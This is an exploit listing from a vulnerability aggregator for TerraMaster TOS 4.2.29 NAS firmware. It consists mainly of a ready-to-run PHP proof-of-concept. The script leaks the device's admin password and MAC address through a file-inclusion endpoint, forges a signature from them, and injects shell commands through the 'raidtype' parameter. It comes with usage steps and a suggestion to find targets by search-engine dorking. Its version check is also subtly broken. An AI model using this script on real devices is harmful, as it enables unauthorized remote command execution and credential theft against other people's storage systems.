Exploit for TerraMaster TOS 4.2.29 Code Injection / Local File Inclusion

Name: Exploit for TerraMaster TOS 4.2.29 Code Injection / Local File Inclusion
Rating: 5 (153 reviews)
2024-10-11 | CVSS 7.4
## https://sploitus.com/exploit?id=PACKETSTORM:182158
=============================================================================================================================================  
| # Title : TerraMaster TOS 4.2.29 Code Injection Vulnerability |  
| # Author : indoushka |  
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.2 (64 bits) |  
| # Vendor : https://www.terra-master.com/global/alltos/ |  
=============================================================================================================================================  
  
POC :  
  
[+] Dorking İn Google Or Other Search Enggine.  
  
[+] uses the CURL to Allow remote command .  
  
[+] Line 138 set your target .  
  
[+] save code as poc.php .  
  
[+] USage : cmd => c:\www\test\php poc.php   
  
[+] PayLoad :  
  
<?php  
  
class TerraMasterExploit  
{  
private $targetUri;  
private $data = [];  
private $terramaster = [];  
  
public function __construct($targetUri)  
{  
$this->targetUri = rtrim($targetUri, '/') . '/';  
}  
  
public function getData()  
{  
// Get the data by exploiting the LFI vulnerability through vulnerable endpoint `api.php?mobile/webNasIPS`  
$response = $this->sendRequest('POST', 'module/api.php?mobile/webNasIPS', ['User-Agent' => 'TNAS']);  
  
if ($response && strpos($response, 'webNasIPS successful') !== false) {  
// Parse the JSON response and get the data  
$resJson = json_decode($response, true);  
if (!empty($resJson['data'])) {  
$this->data['password'] = trim(explode('SAT', explode('PWD:', $resJson['data'])[1])[0]);  
$this->data['mac'] = trim(explode('"', explode('mac":"', $resJson['data'])[1])[0]);  
$this->data['key'] = substr($this->data['mac'], 6, 6); // last three MAC address entries  
$this->data['timestamp'] = time();  
// derive signature  
$this->data['signature'] = $this->tosEncryptStr($this->data['key'], $this->data['timestamp']);  
}  
}  
}  
  
private function tosEncryptStr($key, $strToEncrypt)  
{  
$id = $key . $strToEncrypt;  
return md5($id);  
}  
  
public function executeCommand($cmd)  
{  
// Execute RCE using vulnerable endpoint `api.php?mobile/createRaid`  
$diskstring = $this->generateRandomString(4, 8);  
  
$headers = [  
'User-Agent' => 'TNAS',  
'Authorization' => $this->data['password'],  
'Signature' => $this->data['signature'],  
'Timestamp' => $this->data['timestamp']  
];  
  
$this->sendRequest('POST', 'module/api.php?mobile/createRaid', [  
'raidtype' => ';' . $cmd,  
'diskstring' => $diskstring  
], $headers);  
}  
  
public function getTerramasterInfo()  
{  
// get Terramaster CPU architecture and TOS version  
$response = $this->sendRequest('GET', 'tos/index.php?user/login');  
  
if ($response) {  
preg_match('/ver=.+?"/', $response, $matches);  
if ($matches) {  
$version = $matches[0];  
// check if architecture is ARM64 or X64  
if (strpos($version, '_A') !== false) {  
$this->terramaster['cpu_arch'] = 'ARM64';  
} elseif (strpos($version, '_S') !== false || strpos($version, '_Q') !== false) {  
$this->terramaster['cpu_arch'] = 'X64';  
} else {  
$this->terramaster['cpu_arch'] = 'UNKNOWN';  
}  
  
// strip TOS version number and remove trailing double quote.  
$this->terramaster['tos_version'] = rtrim(substr($version, strpos($version, '.0_') + 3), '"');  
}  
}  
}  
  
public function check()  
{  
$this->getTerramasterInfo();  
if (empty($this->terramaster)) {  
return 'Safe';  
}  
  
if (version_compare($this->terramaster['tos_version'], '4.2.29', '<=') === 0) {  
return "Vulnerable: TOS version is {$this->terramaster['tos_version']} and CPU architecture is {$this->terramaster['cpu_arch']}.";  
}  
  
return "Safe: TOS version is {$this->terramaster['tos_version']} and CPU architecture is {$this->terramaster['cpu_arch']}.";  
}  
  
public function exploit()  
{  
$this->getData();  
if (empty($this->data)) {  
throw new Exception('Cannot retrieve the leaked data.');  
}  
  
echo "Executing exploit...\n";  
// Example command to execute  
$this->executeCommand('whoami'); // Replace 'whoami' with desired command  
}  
  
private function sendRequest($method, $uri, $data = [], $headers = [])  
{  
$url = $this->targetUri . $uri;  
$options = [  
CURLOPT_RETURNTRANSFER => true,  
CURLOPT_CUSTOMREQUEST => strtoupper($method),  
CURLOPT_HTTPHEADER => array_merge(['Content-Type: application/x-www-form-urlencoded'], $headers)  
];  
  
if (strtoupper($method) === 'POST') {  
$options[CURLOPT_POSTFIELDS] = http_build_query($data);  
} else {  
$options[CURLOPT_URL] = $url;  
}  
  
$ch = curl_init();  
curl_setopt_array($ch, $options);  
$response = curl_exec($ch);  
curl_close($ch);  
  
return $response;  
}  
  
private function generateRandomString($minLength, $maxLength)  
{  
$length = rand($minLength, $maxLength);  
return substr(str_shuffle(str_repeat("ABCDEFGHIJKLMNOPQRSTUVWXYZ", $maxLength)), 0, $length);  
}  
}  
  
// Usage  
$exploit = new TerraMasterExploit('http://target-terramaster-url.com');  
$check = $exploit->check();  
echo $check . "\n";  
  
if (strpos($check, 'Vulnerable') !== false) {  
$exploit->exploit();  
}  
  
  
  
Greetings to :=====================================================================================  
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|  
===================================================================================================